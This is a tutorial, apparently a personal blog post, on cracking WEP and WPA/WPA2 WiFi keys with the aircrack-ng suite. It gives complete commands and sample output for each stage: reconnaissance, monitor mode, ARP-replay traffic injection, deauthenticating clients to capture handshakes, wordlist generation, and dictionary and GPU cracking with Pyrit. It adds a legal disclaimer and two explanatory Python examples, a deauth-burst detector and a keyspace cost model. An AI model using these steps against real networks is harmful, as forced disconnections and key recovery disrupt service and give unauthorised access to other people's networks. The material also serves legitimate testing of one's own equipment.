Cracking WiFi WEP, WPA/WPA2 Networks

Legal notices:


This is forbidden and illegal in most countries. You could end up in jail if you crack networks that do not belong to you!

I was just testing out the software to see how and if it worked. This was all done using MY OWN hardware and Access Points.

Software, Hardware, Access Points and Keys:

OS: Funtoo Linux

Version: aircrack-ng 1.1

CPU: Intel(R) Core(TM)2 Duo CPU     T6670  @ 2.20GHz

Hardware: Intel Corporation PRO/Wireless 5100 AGN [Shiloh] Network Connection

Firmware: iwl5000-ucode 8.83.5.1-r1

AP1:  Thomson SpeedTouch ST7XX-series, WEP, Random 10-char alpha-numeric string. (As used by one of the service providers in my country)

AP2:  Thomson SpeedTouch ST7XX-series, WPA2-Personal, Random 10-digit. (As used by another service provider in my country, which means there are a whopping 10^10 possibilities here (10’000’000’000))

Notes:

APs used in article:

00:00:00:00:00:01 - AP1 Above
00:00:00:00:00:02 - AP2 Above

Arguments used in article:

  • wlan-device: Normally ‘wlan0’
  • monitor-device: Normally ‘mon0’
  • chosen-bssid: The BSSID (AP MAC) you want to use
  • chosen-ap: The ESSID (AP Name) you want to use
  • chosen-channel: The AP’s current Channel
  • found-station: A client MAC found while monitoring
  • output-file: The filename prefix for output data (I used the name of the AP)
  • password-lists: A comma-separated list of plaintext files with passphrases
  • found-key: Found key
  • handshake-data: Handshake-data from aircrack-ng (capture file)

Preparations:

  • Connection to an Access Point with relatively high signal strength and minimal obstruction
  • The Access Point should have activity and connected Stations (Clients)
  • Some heavy CPU power with a lot of cores
  • Up to 100 GB of HDD space
  • A good wireless network card, supported by aircrack-ng (and supporting packet injection)
  • Install the aircrack-ng suite
  • Make sure you have a lot of free time
  • Make sure to disable any network services like NetworkManager, avahi and wpa_supplicant.

Cracking WEP encryption is quite easy and fast, but WPA/WPA2 requires a lot of time and CPU power.

Step 1 – Recon listening for APs and Stations:

airodump-ng <wlan-device>
   [ CH XX ][ Elapsed: XX s ][ YYYY-MM-DD HH:SS ]

   BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
   00:00:00:00:00:02  -20       23        0    0  11  54e  WPA2 CCMP   PSK  Test_WPA
   00:00:00:00:00:01  -20       23        0    0  11  54e. WEP  WEP         Test_WEP

   BSSID              STATION            PWR   Rate    Lost  Packets  Probes
   01:00:00:00:00:01  00:00:00:00:00:01  -20   48 -54      3      634
   01:00:00:00:00:02  00:00:00:00:00:02  -20   48 -54      3      634

Now you should pick from the top of the list (it’s sorted by signal quality). Also check that
there is some activity (beacon and data packet counts). Note down the BSSID, ESSID and channel. Any active stations/clients on the network will appear in the second table, in the STATION column.

Step 2 – Starting up monitoring:

airmon-ng start <wlan-device> <chosen-channel>

 Interface Chipset Driver
 wlan0 Intel 4965/5xxx iwlagn - [phy0]
 (monitor mode enabled on mon0)

If successful you should have a <monitor-device> listed in ‘iwconfig’.
Make sure there are not multiple <monitor-device>s in the list. To remove them
run the command in step 6.

Step 3 – Listen for network data and handshaking:

airodump-ng -c <chosen-channel> --bssid <chosen-bssid> -w <output-file> <monitor-device>
 [ CH XX ][ Elapsed: X hour X mins ][ YYYY-MM-DD HH:SS ][ WPA handshake: 00:00:00:00:00:02 ]

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:00:00:00:00:02  -55  96    38107   624522  649  11  54   WPA  CCMP   PSK  Test_WPA

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 00:00:00:00:00:02  01:00:00:00:00:02  -20   54 -54    349   608746  Test_WPA

The top list is the current AP, the bottom list is the Stations/Clients connected to the network.
The dumped file can become quite large if running over several hours (since it saves the data packets).
You can use the ‘--ivs’ argument to capture just the IVs instead of whole packets to save space, but this
only works for WEP encryption (WPA needs the whole packets).

WPA/WPA2: If you get a handshake it will be indicated in the top right corner. It’s this handshake we’ll
use to crack the WPA key.

WEP: Try to collect as much #Data as possible (at minimum 20-40k, even though 10k is sometimes enough)

Step 4 – WEP Encryption:

The basic idea is to capture as much encrypted traffic as possible using airodump-ng.
Each WEP data packet has an associated 3-byte Initialization Vector (IV): after a sufficient
number of data packets have been collected, run aircrack-ng on the resulting capture file.
aircrack-ng will then perform a set of statistical attacks developed by a talented hacker named KoreK.

Since that time, the PTW approach (Pychkine, Tews, Weinmann) has been developed.
The main advantage of the PTW approach is that very few data packets are required to crack the WEP key.

aircrack-ng <output-file>*.cap

After enough data has been collected this command will try to recover the key.
It can take quite a while! If a key was found this message will appear:

 KEY FOUND! [ <found-key> ]

Step 4.1 OPTIONAL – Increase traffic on WEP encrypted network (while listening with ‘airodump’)

aireplay-ng -3 -b <chosen-bssid> -h <found-station> -x 50 <monitor-device>

-3 : this specifies the type of attack, in our case ARP-request replay
-b : MAC address of access point
-h : MAC address of associated client from airodump
-x 50 : limit to sending 50 packets per second

Step 5 – WPA/WPA2 Encryption

The idea here is to collect handshakes between the AP and Clients, store them to a file and later run that file against a dictionary of words. WPA cannot be cracked as easily as WEP because the key is rotated per packet. You can read more about this here.

Step 5.1 OPTIONAL – De-authenticate a station for getting handshakes (while listening with ‘airodump’):

aireplay-ng -0 1 -a <chosen-bssid> -c <found-station> <monitor-device>

16:10:21 Waiting for beacon frame (BSSID: 00:00:00:00:00:02) on channel 11
16:10:21 Sending 64 directed DeAuth. STMAC: [01:00:00:00:00:01] [ 0|116 ACKs]

  -0 : means deauthentication
       '1' is the number of deauths to send (you can send multiple if you wish)
  -a : is the MAC address of the access point
  -c : is the MAC address of the client you are deauthing

You should see the PWR in airodump go down to zero, then come back because the station
re-established the connection and performed a handshake.
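The burst of directed deauths shown above is also what a wireless IDS on the defending side keys on. The following is an added example, not code from the original post: it parses raw 802.11 management frames (constructed here, not captured) and flags any transmitter that sends a cluster of deauthentication or disassociation frames inside a short window; the threshold, window and sample addresses are assumptions made for the demonstration.

```python
# Added example (not from the post): flag bursts of 802.11 deauth/disassoc frames. All frames are constructed.
import struct
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"
# Frame-control byte 0 (protocol version 0, type = management): subtype 10 and 12.
DISCONNECT_SUBTYPES = {0xA0: "disassoc", 0xC0: "deauth"}
def mac_str(b): return ":".join("%02x" % x for x in b)
def mac_bytes(s): return bytes(int(x, 16) for x in s.split(":"))

def parse_frame(raw):
    """Decode a deauth/disassoc frame as (kind, dst, src, bssid, reason); None for anything else."""
    if len(raw) < 26:
        return None
    fc0, _flags, _dur, a1, a2, a3, _seq, reason = struct.unpack("<BBH6s6s6sHH", raw[:26])
    kind = DISCONNECT_SUBTYPES.get(fc0)
    return None if kind is None else (kind, mac_str(a1), mac_str(a2), mac_str(a3), reason)

def detect_bursts(frames, threshold=10, window=1.0):
    """frames: (timestamp_s, raw). Alert per transmitter sending >= threshold disconnects in any `window` seconds."""
    by_src = defaultdict(list)
    for ts, raw in frames:
        parsed = parse_frame(raw)
        if parsed:
            by_src[parsed[2]].append((ts, parsed[1]))  # (time, victim address) keyed by transmitter
    alerts = []
    for src, events in by_src.items():
        events.sort()
        start, best = 0, 0
        for end in range(len(events)):          # sliding window over this transmitter's frames
            while events[end][0] - events[start][0] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts.append({"source": src, "count": best, "targets": sorted({dst for _, dst in events})})
    return alerts

def build_frame(fc0, dst, src, bssid, reason=7):
    # Constructed 26-byte header + reason code (7 = class-3 frame received from a non-associated station).
    return struct.pack("<BBH6s6s6sHH", fc0, 0, 314, mac_bytes(dst), mac_bytes(src), mac_bytes(bssid), 0, reason)

# Constructed sample: 64 directed deauths within 0.3 s from AP2's BSSID (the burst the aireplay output
# above reports), plus one beacon (0x80) and one lone deauth 30 s later that must not trigger.
AP1, AP2, STA2 = "00:00:00:00:00:01", "00:00:00:00:00:02", "01:00:00:00:00:02"
SAMPLE_FRAMES = [(i * 0.005, build_frame(0xC0, STA2, AP2, AP2)) for i in range(64)]
SAMPLE_FRAMES.append((0.1, build_frame(0x80, BROADCAST, AP1, AP1)))
SAMPLE_FRAMES.append((30.0, build_frame(0xC0, "02:00:00:00:00:09", AP1, AP1, reason=3)))

if __name__ == "__main__":
    for alert in detect_bursts(SAMPLE_FRAMES):
        print("deauth burst: %(count)d frames from %(source)s to %(targets)s" % alert)
```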

Step 5.2 – Get some password lists:

You can get them here. After downloading all lists it’s a good idea to concatenate all these files:

cat file1 file2 file3 file4 > WORDS.LST

You can also download this torrent from TPB containing a huge list of the most popular password lists. Download size is about 4GB, when unpacked 13GB.

You can also generate a series of numbers (will become HUGE and takes TIME). This was what I used to create my password list for the WPA encryption. (See top of article)

seq -w 0000000000 9999999999 > NUMBERS.LST # About 100GB in size

Step 5.3 – Cracking the WPA key:

Update: You can use Pyrit to increase the performance dramatically (by using the GPU for calculations). Follow the instructions on how to install it here (the “pentoo” Gentoo overlay contains ebuilds). Gentoo users have to install the dev-python/pyopencl and net-analyzer/scapy packages to make Pyrit compile. Then run:

pyrit eval
pyrit -i <password-lists> import_passwords
pyrit -e <chosen-ap> create_essid
pyrit eval
pyrit batch
pyrit verify
pyrit -o exported_db export_hashdb # export to a hashed database
aircrack-ng -r exported_db <output-file>*.cap # import into aircrack for faster results

Old method: This can take quite a while.

aircrack-ng -w <password-lists> <output-file>*.cap

Results: When aircrack is done you should see something like this:

 KEY FOUND! [ <found-key> ]

Step 6 – Shutting down monitoring:

airmon-ng stop <wlan-device>

 Interface Chipset Driver
 wlan0 Intel 4965/5xxx iwlagn - [phy0]
 (monitor mode disabled)

airmon-ng stop <monitor-device>

 Interface Chipset Driver
 wlan0 Intel 4965/5xxx iwlagn - [phy0]
 mon0 Intel 4965/5xxx iwlagn - [phy0] (removed)

Results:

Cracking a WEP key took about 20,000 Packets and under 15 min.

Cracking the WPA key took me 200+ hours using the generated password list, running at about 1300 k/s. This could have taken many more weeks on my computer if the WPA key-number was higher (It was only about 5% done). Note: This was not tested with pyrit.
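The run time above follows from the work behind each guess. The following is an added example, not from the original post: it derives the PMK with the public 802.11i mapping (PBKDF2-HMAC-SHA1 over the passphrase, salted with the ESSID, which is why Pyrit in step 5.3 builds its database per ESSID) and compares how long AP2's 10-digit policy and two alphanumeric policies would take to exhaust, reading the post's ‘1300 k/s’ as 1300 keys per second as aircrack-ng reports it. The alphanumeric policies and the ‘Test_WPA’/‘SpeedTouch’ ESSIDs are assumed for the illustration.

```python
# Added example (not from the post): cost model for a WPA2-PSK passphrase policy.
# PMK = PBKDF2-HMAC-SHA1(passphrase, essid, 4096 iterations, 32 bytes) is the public 802.11i
# mapping; it is the per-guess work aircrack-ng does and what Pyrit precomputes once per ESSID.
import hashlib

# IEEE 802.11i Annex H.4.1 test vector: passphrase "password", SSID "IEEE" ->
# f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e
def derive_pmk(passphrase, essid):
    """Passphrase-to-PMK mapping that the 4-way handshake is checked against (32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)

def keyspace(alphabet_size, length):
    """Number of candidates for a 'length random characters from an alphabet' policy."""
    return alphabet_size ** length

def hours_to_exhaust(space, guesses_per_second):
    """Worst-case hours to try every candidate at a fixed guess rate."""
    return space / guesses_per_second / 3600.0

def fraction_searched(hours, guesses_per_second, space):
    """Share of the keyspace covered after `hours` at a fixed guess rate (capped at 1)."""
    return min(1.0, hours * 3600.0 * guesses_per_second / space)

# Policies compared: AP2's 10 random digits versus assumed mixed-case alphanumeric policies.
POLICIES = {
    "10 random digits (AP2 in the post)": keyspace(10, 10),
    "8 random mixed-case alphanumerics": keyspace(62, 8),
    "12 random mixed-case alphanumerics": keyspace(62, 12),
}

if __name__ == "__main__":
    rate = 1300.0  # the post's CPU rate, read as keys per second (aircrack-ng's k/s figure)
    print("after 200 h at %.0f keys/s: %.1f%% of the 10-digit space searched"
          % (rate, 100 * fraction_searched(200, rate, keyspace(10, 10))))
    for name, space in POLICIES.items():
        print("%-36s %.3g candidates, %.3g hours to exhaust" % (name, space, hours_to_exhaust(space, rate)))
    # Same passphrase under two ESSIDs gives two different PMKs: the ESSID is the salt, so a
    # default or shared ESSID is what makes a precomputed table reusable across networks.
    a, b = derive_pmk("0123456789", "Test_WPA"), derive_pmk("0123456789", "SpeedTouch")
    print("same passphrase, two ESSIDs, same PMK?", a == b)
```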

Some problems I encountered:

The channel selection in ‘airodump’ and ‘aireplay’ was messed up. I could not use the wireless
tools to make it lock on <chosen-channel>.

The messages I got were:

  • ‘aireplay’ said that the AP and the WLAN adapter were not configured on the same channel
  • ‘airodump’ displayed ‘static channel: -1’ in the top right corner

The fix for this was to set up a local WLAN router and configure it to use channel 11.
Then I connected my computer to that local network, disconnected again and tried ‘airodump’
again, and it worked. Even packet injection using ‘aireplay’ worked.
